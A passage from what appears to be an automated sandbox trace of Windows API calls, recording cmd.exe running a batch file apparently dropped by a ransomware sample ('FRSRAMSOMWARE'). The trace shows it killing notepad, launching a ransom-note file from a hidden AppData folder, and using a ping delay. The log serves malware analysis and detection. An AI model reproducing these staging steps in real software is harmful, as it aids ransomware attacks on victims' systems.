(uMode=0x1) returned 0x0 [0057.648] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd65f60, lpFilePart=0xc8efcc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8efcc*="Desktop") returned 0x1c [0057.648] SetErrorMode (uMode=0x0) returned 0x1 [0057.648] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0057.648] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0057.648] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0057.648] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0057.648] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0057.648] GetLastError () returned 0x2 [0057.648] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0057.648] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd59af0 [0057.648] FindClose (in: hFindFile=0xd59af0 | out: hFindFile=0xd59af0) returned 1 [0057.649] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.COM", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0057.649] GetLastError () returned 0x2 [0057.649] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd5a170 [0057.649] FindClose (in: hFindFile=0xd5a170 | out: hFindFile=0xd5a170) returned 1 [0057.649] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0057.649] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0057.649] SetErrorMode (uMode=0x0) returned 0x0 [0057.649] SetErrorMode (uMode=0x1) returned 0x0 [0057.649] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd61410, lpFilePart=0xc8e8b4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8e8b4*="Desktop") returned 0x1c [0057.649] SetErrorMode (uMode=0x0) returned 0x1 [0057.649] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0057.649] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0057.649] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0057.649] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0057.649] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0057.649] GetLastError () returned 0x2 [0057.649] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0057.649] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd59e70 [0057.650] FindClose (in: hFindFile=0xd59e70 | out: hFindFile=0xd59e70) returned 1 [0057.650] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.COM", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0057.650] GetLastError () returned 0x2 [0057.650] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd59ab0 [0057.650] FindClose (in: hFindFile=0xd59ab0 | out: hFindFile=0xd59ab0) returned 1 [0057.650] GetConsoleTitleW (in: lpConsoleTitle=0xc8eb3c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0057.650] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ea68, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ea4c | out: lpAttributeList=0xc8ea68, lpSize=0xc8ea4c) returned 1 [0057.650] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ea68, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ea54, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ea68, lpPreviousValue=0x0) returned 1 [0057.650] GetStartupInfoW (in: lpStartupInfo=0xc8eaa0 | out: lpStartupInfo=0xc8eaa0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0057.650] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0057.650] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0057.650] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0057.650] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0057.650] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0057.650] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0057.650] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0057.650] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0057.650] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0057.650] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0057.650] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0057.650] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0057.650] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0057.650] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0057.650] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0057.650] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0057.651] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0057.651] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0057.651] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0057.651] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0057.651] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0057.651] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0057.651] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0057.651] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0057.651] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0057.651] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0057.651] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0057.651] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0057.651] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0057.651] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0057.651] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0057.651] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0057.651] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0057.651] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0057.651] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0057.651] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0057.651] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0057.651] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0057.651] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0057.651] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0057.651] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0057.651] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0057.651] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\taskkill.exe", lpCommandLine="taskkill notepad.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8e9f0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill notepad.exe", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ea3c | out: lpCommandLine="taskkill notepad.exe", lpProcessInformation=0xc8ea3c*(hProcess=0x2f0, hThread=0x14c, dwProcessId=0xa88, dwThreadId=0xa98)) returned 1 [0057.839] CloseHandle (hObject=0x14c) returned 1 [0057.839] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0057.839] GetEnvironmentStringsW () returned 0xd2c668* [0057.839] FreeEnvironmentStringsA (penv="=") returned 1 [0057.839] WaitForSingleObject (hHandle=0x2f0, dwMilliseconds=0xffffffff) returned 0x0 [0058.095] GetExitCodeProcess (in: hProcess=0x2f0, lpExitCode=0xc8e9d4 | out: lpExitCode=0xc8e9d4*=0x1) returned 1 [0058.095] CloseHandle (hObject=0x2f0) returned 1 [0058.095] _vsnwprintf (in: _Buffer=0xc8eabc, _BufferCount=0x13, _Format="%08X", _ArgList=0xc8e9dc | out: _Buffer="00000001") returned 8 [0058.095] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0058.095] GetEnvironmentStringsW () returned 0xd30508* [0058.095] FreeEnvironmentStringsA (penv="=") returned 1 [0058.095] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0058.096] GetEnvironmentStringsW () returned 0xd2c668* [0058.096] FreeEnvironmentStringsA (penv="=") returned 1 [0058.096] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ea68 | out: lpAttributeList=0xc8ea68) [0058.096] _get_osfhandle (_FileHandle=1) returned 0x28 [0058.096] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0058.096] _get_osfhandle (_FileHandle=1) returned 0x28 [0058.096] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0058.096] _get_osfhandle (_FileHandle=0) returned 0x24 [0058.096] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0058.096] SetConsoleInputExeNameW () returned 0x1 [0058.096] GetConsoleOutputCP () returned 0x1b5 [0058.096] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0058.096] SetThreadUILanguage (LangId=0x0) returned 0x409 [0058.097] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f0 [0058.097] _open_osfhandle (_OSFileHandle=0x2f0, _Flags=8) returned 3 [0058.097] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0058.097] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=2383, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0058.097] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0058.097] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x11f, lpOverlapped=0x0) returned 1 [0058.097] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=2420, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0058.097] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.png\r\n.png\r\n\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\np\\FRS.exe\"\r\n") returned 37 [0058.097] GetFileType (hFile=0x2f0) returned 0x1 [0058.097] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0058.097] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0058.097] GetEnvironmentVariableW (in: lpName="MYFILES", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F") returned 0x2f [0058.097] _tell (_FileHandle=3) returned 2420 [0058.097] _close (_FileHandle=3) returned 0 [0058.097] _wcsicmp (_String1="start", _String2="DIR") returned 15 [0058.097] _wcsicmp (_String1="start", _String2="ERASE") returned 14 [0058.097] _wcsicmp (_String1="start", _String2="DEL") returned 15 [0058.097] _wcsicmp (_String1="start", _String2="TYPE") returned -1 [0058.097] _wcsicmp (_String1="start", _String2="COPY") returned 16 [0058.097] _wcsicmp (_String1="start", _String2="CD") returned 16 [0058.097] _wcsicmp (_String1="start", _String2="CHDIR") returned 16 [0058.097] _wcsicmp (_String1="start", _String2="RENAME") returned 1 [0058.097] _wcsicmp (_String1="start", _String2="REN") returned 1 [0058.097] _wcsicmp (_String1="start", _String2="ECHO") returned 14 [0058.097] _wcsicmp (_String1="start", _String2="SET") returned 15 [0058.097] _wcsicmp (_String1="start", _String2="PAUSE") returned 3 [0058.098] _wcsicmp (_String1="start", _String2="DATE") returned 15 [0058.098] _wcsicmp (_String1="start", _String2="TIME") returned -1 [0058.098] _wcsicmp (_String1="start", _String2="PROMPT") returned 3 [0058.098] _wcsicmp (_String1="start", _String2="MD") returned 6 [0058.098] _wcsicmp (_String1="start", _String2="MKDIR") returned 6 [0058.098] _wcsicmp (_String1="start", _String2="RD") returned 1 [0058.098] _wcsicmp (_String1="start", _String2="RMDIR") returned 1 [0058.098] _wcsicmp (_String1="start", _String2="PATH") returned 3 [0058.098] _wcsicmp (_String1="start", _String2="GOTO") returned 12 [0058.098] _wcsicmp (_String1="start", _String2="SHIFT") returned 12 [0058.098] _wcsicmp (_String1="start", _String2="CLS") returned 16 [0058.098] _wcsicmp (_String1="start", _String2="CALL") returned 16 [0058.098] _wcsicmp (_String1="start", _String2="VERIFY") returned -3 [0058.098] _wcsicmp (_String1="start", _String2="VER") returned -3 [0058.098] _wcsicmp (_String1="start", _String2="VOL") returned -3 [0058.098] _wcsicmp (_String1="start", _String2="EXIT") returned 14 [0058.098] _wcsicmp (_String1="start", _String2="SETLOCAL") returned 15 [0058.098] _wcsicmp (_String1="start", _String2="ENDLOCAL") returned 14 [0058.098] _wcsicmp (_String1="start", _String2="TITLE") returned -1 [0058.098] _wcsicmp (_String1="start", _String2="START") returned 0 [0058.098] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0058.098] GetStdHandle (nStdHandle=0xfffffff6) returned 0x24 [0058.098] GetStdHandle (nStdHandle=0xfffffff5) returned 0x28 [0058.098] GetStdHandle (nStdHandle=0xfffffff4) returned 0x2c [0058.098] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0058.098] SetErrorMode (uMode=0x0) returned 0x0 [0058.098] SetErrorMode (uMode=0x1) returned 0x0 [0058.098] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\.", nBufferLength=0x208, lpBuffer=0xd65f60, lpFilePart=0xc725dc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F", lpFilePart=0xc725dc*="qb1143663.0F") returned 0x2f [0058.098] SetErrorMode (uMode=0x0) returned 0x1 [0058.098] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\.") returned 1 [0058.098] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0058.098] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0058.098] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\READ_ME_HELP_ME.png", fInfoLevelId=0x1, lpFindFileData=0xc72388, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc72388) returned 0xd59d70 [0058.099] FindClose (in: hFindFile=0xd59d70 | out: hFindFile=0xd59d70) returned 1 [0058.099] GetStartupInfoW (in: lpStartupInfo=0xc728e8 | out: lpStartupInfo=0xc728e8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0058.099] InitializeProcThreadAttributeList (in: lpAttributeList=0x0, dwAttributeCount=0x2, dwFlags=0x0, lpSize=0xc72878 | out: lpAttributeList=0x0, lpSize=0xc72878) returned 0 [0058.099] GetLastError () returned 0x7a [0058.099] InitializeProcThreadAttributeList (in: lpAttributeList=0xd5c168, dwAttributeCount=0x2, dwFlags=0x0, lpSize=0xc72878 | out: lpAttributeList=0xd5c168, lpSize=0xc72878) returned 1 [0058.099] UpdateProcThreadAttribute (in: lpAttributeList=0xd5c168, dwFlags=0x0, Attribute=0x60001, lpValue=0xc7289c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xd5c168, lpPreviousValue=0x0) returned 1 [0058.099] CreateProcessW (in: lpApplicationName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\READ_ME_HELP_ME.png", lpCommandLine="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\READ_ME_HELP_ME.png ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80410, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0xc728a0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x28, hStdError=0x2c), lpProcessInformation=0xc7288c | out: lpCommandLine="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\READ_ME_HELP_ME.png ", lpProcessInformation=0xc7288c*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0058.099] DeleteProcThreadAttributeList (in: lpAttributeList=0xd5c168 | out: lpAttributeList=0xd5c168) [0058.099] ShellExecuteWorker () returned 0x1 [0058.160] _get_osfhandle (_FileHandle=1) returned 0x28 [0058.160] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0058.160] _get_osfhandle (_FileHandle=1) returned 0x28 [0058.160] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0058.160] _get_osfhandle (_FileHandle=0) returned 0x24 [0058.160] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0058.161] SetConsoleInputExeNameW () returned 0x1 [0058.161] GetConsoleOutputCP () returned 0x1b5 [0058.161] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0058.161] SetThreadUILanguage (LangId=0x0) returned 0x409 [0058.161] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f0 [0058.161] _open_osfhandle (_OSFileHandle=0x2f0, _Flags=8) returned 3 [0058.161] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0058.161] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=2420, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0058.161] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0058.161] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0xfa, lpOverlapped=0x0) returned 1 [0058.161] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=2442, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0058.161] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.png\r\n.png\r\n\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\np\\FRS.exe\"\r\n") returned 22 [0058.161] GetFileType (hFile=0x2f0) returned 0x1 [0058.161] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0058.161] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0058.161] _tell (_FileHandle=3) returned 2442 [0058.161] _close (_FileHandle=3) returned 0 [0058.162] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0058.162] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0058.162] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0058.162] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0058.162] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0058.162] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0058.162] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0058.162] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0058.162] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0058.162] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0058.162] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0058.162] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0058.162] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0058.162] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0058.162] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0058.162] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0058.162] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0058.162] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0058.162] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0058.162] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0058.162] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0058.162] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0058.162] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0058.162] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0058.162] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0058.162] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0058.162] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0058.162] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0058.162] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0058.162] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0058.162] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0058.162] _wcsicmp (_String1="ping", _String2="START") returned -3 [0058.162] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0058.162] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0058.162] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0058.162] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0058.162] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0058.162] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0058.162] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0058.162] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0058.162] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0058.162] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0058.162] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0058.162] SetErrorMode (uMode=0x0) returned 0x0 [0058.162] SetErrorMode (uMode=0x1) returned 0x0 [0058.162] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd8b8e0, lpFilePart=0xc8efcc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8efcc*="Desktop") returned 0x1c [0058.162] SetErrorMode (uMode=0x0) returned 0x1 [0058.162] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0058.163] NeedCurrentDirectoryForExePathW 